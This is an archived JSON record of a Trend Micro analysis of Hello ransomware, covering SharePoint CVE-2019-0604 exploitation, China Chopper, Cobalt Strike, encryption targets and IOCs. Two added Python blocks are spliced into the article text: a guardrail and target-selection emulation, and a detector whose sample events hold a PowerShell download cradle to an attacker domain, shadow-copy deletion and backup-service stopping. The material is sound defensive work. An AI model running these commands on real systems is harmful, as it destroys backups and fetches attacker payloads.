{
	"id": "d2acfb30-74bb-472b-9abf-8539ed4edeef",
	"created_at": "2026-04-06T00:14:07.018114Z",
	"updated_at": "2026-04-10T13:11:41.785117Z",
	"deleted_at": null,
	"sha1_hash": "adf535b4db699630baf7c7605a9f8e5523d5d08f",
	"title": "Hello Ransomware Uses Updated China Chopper Web Shell, SharePoint Vulnerability",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 658330,
	"plain_text": "Hello Ransomware Uses Updated China Chopper Web Shell, SharePoint Vulnerability\r\nBy: Janus Agcaoili, Apr 27, 2021. Read time: 5 min (1400 words)\r\nPublished: 2021-04-27 · Archived: 2026-04-05 18:20:16 UTC\r\nWe discuss the technical features of a Hello ransomware attack, including its exploitation of CVE-2019-0604 and the use of a modified version of the China Chopper web shell.\r\nIn January, we encountered a new ransomware using .hello as its extension in one of our cases; it possibly arrived via a SharePoint server vulnerability. This appeared to be a new ransomware family, dubbed the Hello ransomware (aka WickrMe) after the chat application used to contact the cybercriminals responsible. Previous variants were observed using the .hemming and .strike extensions and did not include the cybercriminals’ WickrMe user handles. In contrast, the newer ransom notes accompanying the .hello extension carry the WickrMe contact information.\r\nFigure 1. Ransom note with no WickrMe details and no ransom demand stated\r\nhttps://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\nPage 1 of 13\n\nFigure 2. Updated version of the ransom note with WickrMe usernames and demands\r\nThe ransomware arrives on a target system via the Microsoft SharePoint vulnerability CVE-2019-0604. The attackers then use a Cobalt Strike beacon to launch the ransomware payload.\r\nBased on our own monitoring of this variant since it emerged three months ago, we also observed an update to the China Chopper web shell, likely an attempt to evade detections built on known samples.\r\nLooking at CVE-2019-0604 and China Chopper\r\nAs others have documented, CVE-2019-0604 is abused for initial access to the system. 
However, our analysis also revealed that after the exploit is used for intrusion, the China Chopper web shell (detected by Trend Micro as Backdoor.ASP.WEBSHELL.SMYAAIAS) is deployed to execute PowerShell commands, which in turn download a Cobalt Strike beacon. This leads to the infection of the targeted system with the ransomware payload.\r\nWe previously observed the pattern of CVE-2019-0604 leading to China Chopper web shells, and it seems that the Hello ransomware actors are recycling the methods from 2019 for their attack. What is new in this variant is the use of the arbitrary code execution from the web shell to deploy Cobalt Strike, eventually leading to the ransomware infection.\r\nPivoting into the underground, we found the exploit available for free in one forum. Given that availability, we found no strong indications for attribution, whether for those looking for the exploit or for those using it in ransomware deployments.\r\nHello ransomware routine\r\nFigure 3. Infection chain of a Hello ransomware attack\r\nAs a guardrail, the malware stops executing when the conditions encoded in its command line, “{Malware file path}\\{Malware Name}.exe e {UUID} {BTC}”, are not met, wherein:\r\ne is a hard-coded value that must be supplied as the first argument.\r\nUUID must name a file on the system containing an XML-formatted RSA public key. Otherwise, the malware does not proceed with its encryption routine.\r\nBTC is the amount to be paid, as displayed in the ransom note.\r\nFigure 4. Checking if the current user has admin rights. If not, the routine terminates itself.\r\nFigure 5. 
Finding a formatted RSA public key in the system\r\nThe process of rights escalation is protected with Enigma 3.90, legitimate software primarily used for protecting executable files. It is important to note that the version used for this routine has been outdated for almost 10 years, though the build date appears to indicate otherwise. While we do not know whether the cybercriminals used a legitimate copy or a crack, the software protects the process from analysis and reverse engineering.\r\nFigure 6. The admin rights escalation process is protected with an outdated version of legitimate software.\r\nOnce the routine confirms that the current user has admin rights, it searches for files with specific extensions to gather the files it will encrypt. It also checks for allowlisted directories, which it avoids encrypting.\r\nFigure 7. Searching for files to encrypt\r\nFigure 8. Avoiding the allowlisted directories\r\nAfter the search, the malware encrypts the files, such as Office documents, using the Advanced Encryption Standard (AES), with the AES key itself encrypted using RSA. 
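The pre-encryption conditions described above, as an added example in Python that is not code from the article, from Trend Micro, or from the malware: an emulation of the command-line guardrail (first argument e, a file holding an XML-formatted RSA public key, the ransom amount), of the key-file check, and of the target selection that follows it (the extension patterns are the ones the article lists next, and the skipped directories are the ones it names). It assumes that the XML key uses the .NET RSAKeyValue layout (Modulus and Exponent, with D, P and Q present only for a private key), which is the natural layout for an MSIL sample but is not stated by the article; the %...% directory placeholders are expanded to typical values, the sample key is a toy number, the file names are invented, and the elevation check is passed in as a flag because it cannot be emulated offline.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Target-extension patterns from the article. A trailing '?' (as in *.doc?)
# is read as an optional single character, so *.doc? covers .doc and .docx;
# that reading is an assumption the article does not spell out.
TARGET_PATTERNS = [
    '*.txt', '*.doc?', '*.xls?', '*.ppt?', '*.pdf', '*.csv', '*.zip?',
    '*.rar?', '*.7z?', '*.gz?', '*.sql', '*.mdf', '*.myd', '*.ibd',
    '*_fsm', '*_vm', '*.db?', '*.rpt',
]
# Skipped directories from the article, with the %...% placeholders expanded
# to assumed typical values (%All Users Profile% as C:/ProgramData, etc.).
# Paths are compared lower-cased and with forward slashes.
SKIP_PREFIXES = ['c:/windows/', 'c:/programdata/', 'c:/$recycle bin/',
                 'c:/common files/', 'c:/windowspowershell/']


def pattern_to_regex(pattern):
    # '*' -> any run of characters, '?' -> zero or one character,
    # everything else (including '.') is matched literally.
    parts = []
    for ch in pattern:
        parts.append('.*' if ch == '*' else '.?' if ch == '?' else re.escape(ch))
    return re.compile(''.join(parts), re.IGNORECASE)


TARGET_REGEXES = [pattern_to_regex(p) for p in TARGET_PATTERNS]


def is_target(path):
    # True when the name matches a target pattern and the file is not under
    # a skipped directory. chr(92) is the backslash, written this way to keep
    # the example free of escape sequences.
    norm = path.replace(chr(92), '/').lower()
    if any(norm.startswith(prefix) for prefix in SKIP_PREFIXES):
        return False
    name = norm.rsplit('/', 1)[-1]
    return any(rx.fullmatch(name) for rx in TARGET_REGEXES)


def parse_rsa_xml(text):
    # Parses the .NET RSAKeyValue layout (Modulus/Exponent, plus D/P/Q/...
    # when a private key is stored). Returns the integer fields and a
    # 'private' flag, or None when the text is not such a key.
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return None
    if root.tag != 'RSAKeyValue':
        return None
    fields = {}
    for child in root:
        try:
            raw = base64.b64decode(child.text or '', validate=True)
        except ValueError:
            return None
        fields[child.tag] = int.from_bytes(raw, 'big')
    if 'Modulus' not in fields or 'Exponent' not in fields:
        return None
    fields['private'] = 'D' in fields
    return fields


def make_rsa_xml(modulus, exponent=65537):
    # Builds a constructed public RSAKeyValue document (toy modulus, not a
    # real key) so the guardrail can be exercised offline.
    def b64(n):
        return base64.b64encode(n.to_bytes((n.bit_length() + 7) // 8, 'big')).decode()
    return ('<RSAKeyValue><Modulus>' + b64(modulus) + '</Modulus><Exponent>'
            + b64(exponent) + '</Exponent></RSAKeyValue>')


# Constructed on-disk contents that the guardrail is checked against.
CONSTRUCTED_FILES = {
    'c:/users/public/4f9d1c2a.key': make_rsa_xml(0xD5A1B2C3E4F50617A9),
    'c:/users/public/notes.txt': 'this is not a key file',
}


def check_guardrail(argv, files, is_admin=True):
    # Emulates the conditions the article describes: elevated process,
    # argv[1] == 'e', argv[2] names a file holding an XML RSA public key,
    # argv[3] is the amount shown in the note. Returns the failed checks;
    # an empty list means the sample would continue into encryption.
    failures = []
    if not is_admin:
        failures.append('not_admin')
    if len(argv) < 4:
        failures.append('missing_arguments')
        return failures
    if argv[1] != 'e':
        failures.append('first_argument_not_e')
    if parse_rsa_xml(files.get(argv[2], '')) is None:
        failures.append('no_xml_rsa_public_key_file')
    return failures
```

The emulation is mainly useful when detonating the sample: it spells out what has to be on disk and on the command line before the encryption routine runs, which is why a bare execution in a sandbox produces nothing. The private flag returned by parse_rsa_xml is an added check for incident responders: a key file recovered from a host that carries D, P and Q holds decryption material, whereas the public-only file the guardrail expects does not.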
Specifically, it encrypts files with the following extensions:\r\n*.txt\r\n*.doc?\r\n*.xls?\r\n*.ppt?\r\n*.pdf\r\n*.csv\r\n*.zip?\r\n*.rar?\r\n*.7z?\r\n*.gz?\r\n*.sql\r\n*.mdf\r\n*.myd\r\n*.ibd\r\n*_fsm\r\n*_vm\r\n*.db?\r\n*.rpt\r\nFigure 9. AES key creation and encryption of files (also with AES)\r\nFigure 10. AES initialization function\r\nWe noticed that the malware avoids encrypting files in the following folders, so as not to affect the system or its own execution:\r\n%Windows%\\\r\n%All Users Profile%\\\r\n%System Root%\\$recycle bin\\\r\n%System Root%\\Common Files\\\r\n%System Root%\\windowspowershell\\\r\nIt appends the extension .hello to the encrypted files and drops the following ransom notes:\r\n%public%\\Desktop\\Readme!!!.txt\r\n%Desktop%\\Readme!!!.txt\r\nFigure 11. Appending the extension to the encrypted files\r\nFigure 12. Dropping the ransom notes on the infected system\r\nThe cybercriminals behind this malware make sure to inhibit file restoration by deleting shadow copies and backup drives. We found that the routine executes the following commands:\r\n\"%System%\\vssadmin.exe\" delete shadows /all – Deletes shadow copies\r\n\"powershell.exe\" Dismount-DiskImage \"{Found filepath.vhd}\" – Dismounts virtual drives\r\nFigure 13. 
Deleting shadow copies and dismounting virtual drives\r\nIt also deletes files whose names contain the string backup, as well as files with extensions used for backup files and virtual drives, such as *.bak, *.bk, *.vbk, *.vbm, and *.vhd.\r\nFigure 14. Deleting backup copies of files\r\nAdditionally, during the search the ransomware terminates services if it finds specific backup and database processes, to ensure that their files also get encrypted. If the database applications were still running, their database files would be “in use” and could not be accessed for encryption. The matched names are:\r\nmssql\r\nsql\r\npostgresql\r\noracle\r\nmysql\r\nveeam\r\nbackup\r\nFigure 15. Terminating services\r\nWe also noticed cases in which the ransomware does not proceed with its encryption routine even though ransom notes are present on the system. This might be the result of improper execution or perhaps some missing components.\r\nUpdated China Chopper web shells\r\nIn addition, we noticed one subtle difference between the China Chopper web shell sample we had observed previously and the sample the cybercriminals used in this new attack.\r\nFigure 16. Comparison of China Chopper web shell script versions from the previous attack (top) and the updated version taken from the most recent infection (bottom)\r\nWe think that this modified version might be an attempt to circumvent current detections of China Chopper samples. 
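Because the web shell's script text changed while its behaviour did not, a content signature for China Chopper is the wrong layer to lean on; the chain the article describes (the IIS worker process spawning a shell, a PowerShell download cradle, vssadmin shadow deletion, Dismount-DiskImage, and the stopping of backup and database services) is stable across variants. The following Python is an added example, not code from the article or from Trend Micro, that runs that behavioural logic over constructed process-creation events. The event shape and field names, the hello.exe process name, the invented VHD path and the use of net.exe stop to end services are assumptions (the article names the targeted service strings but not the mechanism); the domain in the cradle is the article's own IOC, defanged.

```python
import re

# Constructed process-creation events in the shape of Sysmon event 1 or
# EDR telemetry. Image and parent hold the binary name only; the command
# lines are modelled on the article. hello.exe is a placeholder name.
EVENTS = [
    {'id': 1, 'parent': 'w3wp.exe', 'image': 'cmd.exe',
     'cmdline': 'cmd.exe /c whoami'},
    {'id': 2, 'parent': 'cmd.exe', 'image': 'powershell.exe',
     'cmdline': '''powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('hxxps://micron[.]xxuz[.]com/css/fps.css')'''},
    {'id': 3, 'parent': 'hello.exe', 'image': 'vssadmin.exe',
     'cmdline': 'vssadmin.exe delete shadows /all'},
    {'id': 4, 'parent': 'hello.exe', 'image': 'powershell.exe',
     'cmdline': 'powershell.exe Dismount-DiskImage -ImagePath E:/backups/fileserver.vhd'},
    {'id': 5, 'parent': 'hello.exe', 'image': 'net.exe',
     'cmdline': 'net.exe stop VeeamBackupSvc /y'},
    {'id': 6, 'parent': 'explorer.exe', 'image': 'powershell.exe',
     'cmdline': 'powershell.exe Get-ChildItem C:/Users'},
    {'id': 7, 'parent': 'services.exe', 'image': 'svchost.exe',
     'cmdline': 'svchost.exe -k netsvcs'},
]

WEB_SERVER_IMAGES = {'w3wp.exe'}  # IIS worker process that hosts SharePoint
SHELLS = {'cmd.exe', 'powershell.exe', 'pwsh.exe'}
# Download-cradle markers commonly seen in PowerShell stagers.
CRADLE_RX = re.compile('downloadstring|downloadfile|invoke-webrequest|iwr |curl |wget |iex ', re.IGNORECASE)
# Service-name fragments the article says the ransomware targets (substring match).
SERVICE_KEYWORDS = ['mssql', 'sql', 'postgresql', 'oracle', 'mysql', 'veeam', 'backup']
# net stop / sc stop <service>; assumed mechanism, the article names only the targets.
SERVICE_STOP_RX = re.compile('(net1?[.]exe|sc[.]exe) +stop +(?P<svc>[^ ]+)', re.IGNORECASE)


def detect(event):
    # Returns the names of the rules this single event triggers.
    parent = event['parent'].lower()
    image = event['image'].lower()
    cmd = event['cmdline'].lower()
    hits = []
    if parent in WEB_SERVER_IMAGES and image in SHELLS:
        hits.append('webshell_shell_spawn')
    if image in SHELLS and CRADLE_RX.search(cmd):
        hits.append('powershell_download_cradle')
    if image == 'vssadmin.exe' and 'delete' in cmd and 'shadows' in cmd:
        hits.append('shadow_copy_deletion')
    if image in SHELLS and 'dismount-diskimage' in cmd:
        hits.append('virtual_disk_dismount')
    m = SERVICE_STOP_RX.search(cmd)
    if m and any(k in m.group('svc') for k in SERVICE_KEYWORDS):
        hits.append('backup_or_db_service_stop')
    return hits


def scan(events):
    # Maps event id -> triggered rules, omitting events that hit nothing.
    findings = {}
    for event in events:
        hits = detect(event)
        if hits:
            findings[event['id']] = hits
    return findings


def chain_stages(events):
    # Distinct stages of the chain seen on the host. Several distinct stages
    # within one window are a far stronger signal than any single rule.
    return sorted({hit for event in events for hit in detect(event)})
```

Any one rule fires in benign contexts (an administrator running vssadmin, a backup job dismounting an image, a build script using Invoke-WebRequest), so the per-event findings are for triage; chain_stages, evaluated per host over a short window, is what to alert on, and a shell child of w3wp.exe on a SharePoint server is worth an alert on its own.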
The script format might have changed, but its use is still the same: to give the attackers the capability of executing arbitrary shell commands on an affected system.\r\nConclusion\r\nMicrosoft released an advisory for CVE-2019-0604 and patched the flaw in 2019. Since the prominent attacks abusing it in 2020, exploitation of the vulnerability has continued to make the news. The use of the exploit and China Chopper web shells together has been observed in varying attack routines and raises the question of whether the combination of the two tools indicates a certain level of access among the cybercriminals using them, or whether more parties are involved, capable of buying access from several sources. It is also worth noting that, two years later, the vulnerability’s continued abuse strongly implies that a large number of companies still have not applied the patch.\r\nFurthermore, online searches turn up more samples from victims with the same ransom notes, notably with identical content but different email addresses. The ransom demanded also increases as more time passes between the original infection and the moment victims email the cybercriminals. Based on our monitoring, we did not observe a response from the cybercriminals despite emails sent to them.\r\nRansomware infections remain a serious threat to users and to enterprises’ operations. Here are a few best practices to mitigate this threat:\r\nAvoid opening unverified emails or clicking on their embedded links, as these can start the ransomware installation process.\r\nBack up your important files using the 3-2-1 rule: keep three copies of your data on two different storage media, with one of the copies in a separate location. 
\r\nRegularly update software, programs, and applications to ensure that your apps are current and equipped to defend your system against exploits and new vulnerabilities.\r\nEmploy a cross-layered threat detection and response system capable of monitoring known, unknown, and stealthy threats and attacks. Secure new and existing workloads regardless of the environment to keep data safe without compromising operations and performance.\r\nIndicators of Compromise (IOCs)\r\nSHA256 Detection\r\n2e610b407b6477cde10af9bcd5c24242e31f6acb36df87d0d7b9df27c29c3ebb Ransom.MSIL.HELLO.YALP-A\r\n5deb5eae1af5602c6b8d8c00b2249d67da663bfc32df692a9575c4b65f7276bb HackTool.Win32.COBEACON.YPBCWT\r\n3bdbfe712926452c4dab3adbb6fdb3f65955ceabd7e3351d83840e6f83e72788\r\n253939be5c1db119f84a6c55e39765baf95d75d98355c5ecd71828d90e3c84dc Trojan.PS1.COBEACON.SMYXAK-B\r\n45793b947e2c8c09742ba5d85b544471d9e5ccedd395dc3ee7faaa9c83dc65b6 Ransom.Win32.HIDDENTEARHAPPY.AB.note\r\nURLs\r\nhxxps[:]//micron[.]xxuz[.]com/css/fps.css\r\nhxxp[:]//138[.]124[.]180[.]182/css/fpi.css\r\nhxxps[:]//microsofts[.]dnsrd[.]com/css/home.css\r\nhxxps[:]//vlad-cdn[.]com/console/login.php\r\nMITRE ATT\u0026CK Framework\r\nWith additional insights from Trend Micro Research.\r\nSource: https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html"
	],
	"report_names": [
		"hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434447,
	"ts_updated_at": 1775826701,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/adf535b4db699630baf7c7605a9f8e5523d5d08f.pdf",
		"text": "https://archive.orkl.eu/adf535b4db699630baf7c7605a9f8e5523d5d08f.txt",
		"img": "https://archive.orkl.eu/adf535b4db699630baf7c7605a9f8e5523d5d08f.jpg"
	}
}